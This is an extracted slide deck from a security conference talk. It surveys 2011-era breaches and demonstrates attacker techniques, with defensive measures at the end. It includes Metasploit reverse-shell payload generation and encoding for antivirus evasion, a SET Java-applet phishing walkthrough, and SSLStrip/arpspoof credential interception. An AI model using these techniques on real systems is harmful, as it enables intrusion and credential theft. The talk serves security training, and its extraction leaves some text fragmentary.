If I Wake Up Evil - ISACA Denver Chapter

If I wake up evil...
John Strand
Black Hills Information Security
State of the Hack
(Why We are Losing)
• The attackers have a clear advantage on us
They don't play by any rules
We do...
They have a well defined structure for learning
Little to no attribution
• Many think that compliance equals security
This is not true
Compliance with regulations is a guideline
They are a series of objectives
• Many times we don't have time to "know" our
networks and systems
Malware Example:
• Devastating worm that infected over 15 million
• Infection through MS08-067, file shares and removable
Microsoft disabled autorun in response to this worm
Tries to kill AV every second
Blocks certain DNS lookups
Disables Auto update
Disables Safe-mode
• Highly effective defenses
• Updates itself
• Uses crypto
State Of The Hack:
100 Million accounts compromised
Shut down their network for 23 days
$171 million in lost revenue and costs
By the way, there were multiple Sony hacks this quarter
Cross analysis between 1 million Sony passwords and 250K
Gawker passwords revealed that many people reuse
– http://www.theregister.co.uk/2011/06/08/password_re_use_sur
• Also, many people use password complexity exactly like we
have trained them
– And it still does not work
State Of The Hack:
Bank Of America
• “Hundreds” of accounts compromised
– But in this case size does not matter
• The accounts we targeted “high value” targets
• The attack was launched by an insider
• Overly elaborate attack
– Ordered new checks, forwarded phone calls and arranged
for the check pickup
– The attackers were unaware of automatic bill-pay...?
• 10 million dollars stolen
• How do we defend against an insider?
State of the Hack RSA
• About the RSA attack..
– It might be worse than we thought, and we thought it was bad
• Attacks against LMCO, L-3 and possibly Northrup Grumman
• SecureID’s generate a “random” pin every 60 seconds
• This pin is based on a random seed file that is shared byt the
server and to token
• If you obtain the seed file from the server (.ASC or .XML) you
can clone the pin on the fob
• What if RSA was storing PINs for its customers?
• What if those PINS were compromised
• Unfortunately, we don’t know a whole lot
Wait, what?
Hi John,
Company X is asked every day if Product X could have stopped
the latest du jour threat that is bypassing traditional blacklistingbased antivirus.
On June 26th, 2010, we showed how Product X beat down
Stuxnet. On August 26th, Product X beat down DLL Hijacking
attempts. The threats keep coming, so which ones should we beat
down next?
How did it Infect?
• USB… Yep, plain old USB
• The easiest way to bypass the firewall, IDS and IPS
• There were a number of 0-days
.lnk file vulnerability
Print Spooler (CVE-2010-2729)
Win32 Keyboard Layout Vulnerability
Privilege escalation via Task Schedule
• There has been some misinformation about the Task
Scheduler vulnerability from some AV vendors
– You do not need to be in the local administrators group
• It also used some older exploits like 08-067
– Conficker anyone?
On to the Details
• Remember the Windows baseline section of 464?
– tasklist /m
– tasklist /m s7otbxdx.dll
• Stuxnet used dll replacement to insert execution
• In fact, it moved s7otbxdx.dll to s7otbxsx.dll inserted
its own s7otbxdx.dll
– This is important because it means the attackers had an
understanding of the original code
– 93 of the original 109 exports are forwarded to the renamed
– The remaining 16 get us excited
How did it Communicate?
• Once it infects a system it tries to connect to two sites to
verify connectivity:
– www.mypremierfutbol.com
– www.todaysfutbol.com
– Clearly not targeting a US audience….
• P2P Communication
• C2 servers in Malaysia and Denmark
– Checking Versions
• It also uses peer-to-peer communication
• Remember what we covered in the network lab?
– Yeah, it tried to spread via shares
– Watch that system-to-system communication
• Watch for PLC systems connecting to the Internet
Clouds.... Evil Clouds.
What is Cloud Computing?
• I had to look it up
– I hear about it a lot, but I don’t have a clear concept of
what it is
• Straight to the Wiki!
– “Cloud computing is Internet-based computing, whereby
shared resources, software and information are provided to
computers and other devices on-demand, like a public
• I get it… It is like a Bot-Net!
• Based on Vendor Information it looks like it is going to
make me irrelevant
But What is it?
“It is a paradigm shift..” Oh oh… This is going to be good.
It is a paradigm shift following the mainframe and client-server shifts that preceded
it. Details are abstracted from the users who no longer have
need of, expertise in, or control over the technology
infrastructure "in the cloud" that supports them.[1] Cloud computing
describes a new supplement, consumption and delivery model
for IT services based on the Internet, and it typically involves the provision
is a byproduct and consequence of the ease-of-access to
remote computing sites provided by the Internet.[4]
• The term cloud is used as a metaphor for the Internet, based on the
of dynamically scalable and often virtualized resources as a service over the Internet.[2][3]
cloud drawing used in the past to represent the telephone network [5], and later to depict the
Internet in computer network diagrams as an abstraction of the underlying infrastructure it
represents.[6] Typical cloud computing providers deliver common business applications online
which are accessed from a web browser, while the software and data are stored on servers.
I Am Letting Wikipedia Write All
of My Presentations!
• Security could improve due to centralization of data[35],
increased security-focused resources, etc., but concerns
can persist about loss of control over certain sensitive
data, and the lack of security for stored kernels[36].
Security is often as good as or better than under
traditional systems, in part because providers are able to
devote resources to solving security issues that many
customers cannot afford.[37] Providers typically log
accesses, but accessing the audit logs themselves can be
difficult or impossible. Furthermore, the complexity of
security is greatly increased when data is distributed
over a wider area and / or number of devices.
Looking Forward To
But Wait!!!
Did they say “Internet”
• “The term cloud is used as a metaphor for the
• But the Internet is Evil!!
– How can this be so?
Lets set the stage..
• We have to know who it is we are working
• Who are the people we are defending?
• Who is attacking?
– What are their capabilities?
– What are their means?
• What are the tools we have to defend
• Who is on our side?
Your Users
• They are trying to go places they shouldn’t
• Security is not a major concern
– They never get into trouble
• “It was just a pop-up!”
– They “think” they know what it would look like if they were
• No skull and crossbones? Good to go!
• You “think” they are “stupid”
• Are they?
Granny Max
• Loves to gamble
• Likes Polka Dots
• Likes anything with “Polka”
in it
• Thinks the CD tray is a
• Collects Gnomes
• Bypasses your outbound
web filters buy using a third
party anonymizing proxy
Phil… From Accounting
• Works with numbers…
• ... and Terabytes of
• Has a “slight” problem
• Does not get along
with Granny Max
• Hates cats
• Bypasses your filtering
by using a SSH tunnel
through his home
The “Average” Users
• Do not gamble…
– … at work
• Do not surf porn…
– ….at work
• Likes: Facebook, YouTube,
Politics, eBay, Googling,
Fantasy football, Fark,
Drudge Report, the
Huffington Post, CNN,
• Dislikes: Web filters
• Quickly becoming friends
with Phil and Gran Max to
learn ways to bypass your
The Bad Guys
• Motivated
– Can you imagine their
HR department?
• Wicked skilled (more on
this later)
• They either own or infect
many of the sites your
more “interesting” users
are going to
The Bobs
The Cloud
• The Internet is big…
• … really big
• You just won't believe
how vastly hugely
mindboggingly big it is...
• Most of it is worthless..
and Evil!
• Many of your users will
not stop clicking until they
visit every site
Lets Compromise An Account
Bypassing AV
• "But Anti-Virus software will protect us... Right?"
• Anti-Virus, like all software, has its limitations
• Do not believe for one second that it is the ultimate
• It works great for detecting and removing known
• That means someone was infected before you
• Many dedicated and targeted attackers are not
concerned about anti virus software
• But why?
How Would an Attacker Bypass
– There are a variety of ways
– But remember the goal is to create a "new" signature
– Attackers can use packers to "pack" the malicious code
• This creates a self-extracting and executing file
• In the process of packing the executable is scrambled
• Functions may not be where AV expects them to be
– Attackers can also use tools to "encode" the executable
• This has been around for a long time in tools like ADMutate and
• One technique these tools use is to add a large number of "jumps"
to the code making it difficult to reverse
No Tricks
• Let's say an attacker wanted to create an
executable that created a reverse
connecting, memory based rootkit
• Straight msfpayload to an exe
• ./msfpayload
Not Too Bad..
But Wait!!!
Thank You Panda…
Add a Bit of UPX..
• Attackers can use compression as a means to bypass
AV products
• One product that attackers often use is the Ultimate
Packer and Unpacker for Executables (UPX)
• upx -2 -f -o PlainMetRevUPX.exe PlainMetRev.exe
This will create an executable that is compressed with a
setting of 2
The settings go from 1 to 9
The higher the level the greater the compression
2 works very well for bypassing AV
Cut in Half?
What if We Used the Browser for
• ./msfpayload windows/shell/reverse_http
• This is slightly different than the previous
• This is a shell that makes a reverse HTTP
Down to Only 17.95%
What if We Try a Reverse http
Shell with Encoding?
• ./msfpayload windows/shell/reverse_http
LHOST= LPORT=8080 R | ./msfencode -b '' " t exe -o EncShellRevHttp.exe
• We are now using encoding on the executable
• This means the executable will be different every time it is
• The default encoder with the Metasploit framework is
"Shikata ga nai"
• This means "There is nothing that can be done about it"
in Japanese
Race to 0
Bypassing IDS
• There are a variety of ways to bypass AV
• But what about IDS?
• Turns out many IDS products have the same
"signature-based" problem
• Some claim to be "heuristic"
• We can fragment our attacks
Separate the attack across multiple packets
• We can encode the attacks
Into Base 64
Bypassing IDS:
Uncreative, Yet, Effective Ways
– Why not have the victim system connect to us!
• We bypass many firewall and IDS/IPS restrictions
• We can make it look like standard web traffic
– We could have our attacks go over Secure Sockets
• Many organizations are using SSL to protect their traffic in transit
• However, it often blinds them to attacks against their web servers
• Attackers can try Cross Site Scripting, SQL Injection and Command
injection all day long
– Remember just because there is a lock it does not
mean it is "secure"
Blending with Normal Processes
• One of the easiest ways for an attacker to hide or even
attack your systems is to "blend-in"
• Many people think that an attacker will only use exploits to
"spread" through your network
This is not true
• Rather, they will utilize built-in services and commands to
compromise additional systems
SSH or RDP with accounts and passwords from the first system
• This will not be caught by your IDS because it is "normal"
Exploit Demo
Java as a Payload
• Java is an excellent payload option
Its what's for breakfast.
– Installed pretty much everywhere
– Users are accustomed to clicking “Run” for Java apps
• SET has the ability to take a Metasploit payload and
export it to a .jar file
• In this example we will be taking the default SET web
page and inserting a .jar file into it
• When a user connects to our site the java app will
• Shell will ensue
Starting SET
Nice ASCII Art!
SETting Options
Hack By
Please select Option Number 2
SET Website Attack Vectors
The Option We
Will Be Using
Very Effective
If You Know
Import your own website is even more effective if you are
not particularly good at HTML
Choosing Java as Our Payload
Can be flaky
Setting the Payload Type
Please Select Option 1 for 32 Bit
Or, 6 for Windows 64 Bit Systems
• Meterpreter and VNC payloads are nice
- However, they can be unstable
• Shell Reverse_TCP tends to be the most stable in testing
• Knowing if your target is running 64 bit can be a big help
Setting the Encoder
We Are Going to Use
We Will Encode Twice
Linux and OS X Payloads
Please Choose “no”
Metasploit Starting
Payload in Waiting
Because Cows are Cool
Reverse Payload
Listening on 4444
Browsing to Your Site
http://[Your Linux IP]
Everyone Clicks “Run”
Got Shell?
Interacting with Our
• Yes!!!
• Now you can wield your Windows
Time toCommand-line
do the “Happy
There are other ways...
ISR Evilgrade
• Modular exploit tool to spoof Software Update Responses
– "Yes, there IS an update available!"
• Delivers executable of your choosing to the victim
• Includes support for multiple vulnerable updaters
– JRE, WinZip, WinAmp, OpenOffice, iTunes, Notepad++ and more
• Relies on MITM from third-party attack
– LAN and Ettercap, or remote with DNS manipulation
• Perl-based console interface similar to Cisco IOS
– Output and navigation slightly messy
USB Threat Update
• Let’s say you disabled Autorun on all your systems
• Further, let’s say you disable USB mass storage
• You can still be compromised by a tin of Altoids
• Enter Programmable HID USB Keystroke Dongle
• The latest attack vector from IronGeek
• He is now trying to find fixes
• Implemented S.E.T
• Upload any Metasploit Payload
Wireless Device Control
“My SSID is P0wned”
• “But we do not have wireless in our network!”
– Are you sure?
• One access point can bypass all of your external controls
• “Free Wireless Internet” anyone?
• Attackers do not need to find an access point
– They just need to find a client
– Karmetasploit is evil
• This also goes for your phone
– Do you use GSM?
– http://www.shmoocon.org/presentations-all.html#srsly
• By Paterva
• Focus is on “extreme” reconnaissance
• GUI based display
– I know… I know.. But the GUI rocks
• We can pull
Personal Information
Additional Email addresses
Who is John Strand?
Step 2:
Click Here
Step 3: Fill In Email
Step 1:
Click Email
Starting the Transformations
Right click
And Select
All Transforms
It can be a lot of data
Click Yes
What did we find
A friend
What about SSL?
• There are a number of different ways to hijack SSL
– See WebMTIM from dsniff
• Unfortunately the user will receive “negative
– Just another way of saying they get a pop-up box
• Most users will click through
– The paranoid ones will not
• So how do you hijack the overly paranoid user?
We can use SSLStrip
• Another great tool from Moxie Marlinspike
• This tool strips away SSL from the end user
– Hence the name
• The HTTPS will become HTTP
– No negative feedback to the user
• The vast number of users will not notice
– Even the very paranoid ones
• The 300
• We need to use a tool like dsniff to hijack the traffic and
a tool like iptables to redirect the traffic to where sslstrip
is waiting
Get your targets IP and Gateway
SSL Strip
SSLStrip: iptables
SSLStrip: arpspoof
SSLStrip: Got one!
• Now Surf to http://gmail.com and try to log in!
You should see some activity in SSLStrip!!
SSLStrip: Checking the logs
Looks like we got some data!!!
SSLStrip: Looking at the log
SSL Strip: /hackme
Starting over..
Back to Basics…
• Baseline your systems
– Processes, DLL’s for Core applications, Users, etc.
• Baseline your network traffic
– Why would you allow PLC systems to connect to the Internet?
• Monitor those baselines
– If at all possible, do this hourly
• Don’t use shady Russian contractors with compromised
• Train everyone, because everyone is a target
– Secure the human
• Yes, even you
– Sounds paranoid, I know
Risk and the 20 Critical Controls
Autostart Entry Points
• There are a number of Autostart entry points on your
Windows systems
• Run
• RunOnce
• RunOnceEx
• There are a lot more of these than we can cover in a few
– Useruinit
– Boot.ini
• There needs to be a better way to look at what is going
to automatically start on our Windows computers
Sysinternals Autoruns
Find Evil
Red Curtain
Malware Detection on Linux
• Rather than look for specific malware we can also look
for indications of compromise
• Rootkit Hunter and chkrootkit do this
• They also look for a few specific binaries
• Very easy to set up and use
• Looks for
Certain hashes
Wrong File permissions
Hidden Files
Orphaned files
• Why use both tools?
• Sometimes the best way to know you are compromised
is to check your DNS cache
• Not 100%, but nothing is
• This script queries your DNS server and sees if there are
any DNS entries that are for “bad” sites
• It can automatically pull down a blacklist and do a
• However, you can provide your own blacklist
• Best used daily (think Nagios)
• http://www.mayhemiclabs.com/tools/malwarednsscraper
Running Malwarescraper.pl
Offensive Countermeasures:
Is this allowed?
The Split
• When discussing security we need to be of two separate
– Offensive
– Defensive
• A little lesson on OODA loops
• In our current defensive postures how can we do this
Dynamic Blacklisting
• @echo offfor /L %%i in (1,1,1) do @for /f "tokens=3"
%%j in ('netstat -nao ^| find ^":3333^"') [email protected] /f
"tokens=1 delims=:" %%k in ("%%j") do netsh
advfirewall firewall add rulename="WTF" dir=in
remoteip=%%k localport=any protocol=TCP
• Easy copy and paste link from:
– http://pauldotcom.com/wiki/index.php/Episode203
Dynamic Blacklisting
• [[email protected] ~]# while [ 1 ] ; echo "started" ; do IP=`nc
-v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3
| cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP
; done
• Easy copy and paste link from:
– http://pauldotcom.com/wiki/index.php/Episode204
• Does the same thing we covered in the Blacklisting
• However, it does offer more flexibility
– Logging
– Rerouting traffic
– Blocking through hosts.deny
• A bit of an older tool (2003) but still surprisingly effective
• Set it up before an audit or a penetration test and make
your Linux/Unix systems “go away”
• Still requires a listener (nc) on a honeyport.
Word Web-Bugs
• Very easy to use
• Supposed to be used for penetration testing
• However this tactic works great at tracking intellectual
• Not all ways of finding attribution need to result in shell
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and
watch how fast an attacker runs the macros
How does it Work?
• It simply inserts a reference to a css or image to a web
• When the doc is opened it tries to open the URL
• Direct connection!
Metasploit De-cloak Engine
• Hunting back where the attackers are coming from
• This is done by having the victim/attacker connect back using
a number of applications
• By having them connect in a number of different ways with
different applications we increase the odds of finding their
“real” IP address
Running the De-Cloak Engine
Implementing the Decloak
• You can use their servers
– Generate a MD5 string based on the attacker/victims
– Embed an iframe directing them to the decloak site
– Recover the information gathered from decloak.net
• You can also implement their API’s on your servers
– Implement a custom DNS server
– Create a Database for the results
– Embed the the Java and Flash applications from decloak.net
SANS Denver!!!
June 25-30
• http://www.sans.org/rocky-mountain-2011/
• SANS Security Essentials Bootcamp Style
• Management 414: SANS +S™ Training Program for the
CISSP® Certification Exam
– ISACA10 = 10% off
• Management 512: SANS Security Leadership Essentials For
• Security 504: Hacker Techniques, Exploits & Incident Handling
• Security 505: Securing Windows
• Developer 522: Defending Web Applications Security
• Forensics 558: Network Forensics
John’s Contact Information
Strandjs = twitter

similar documents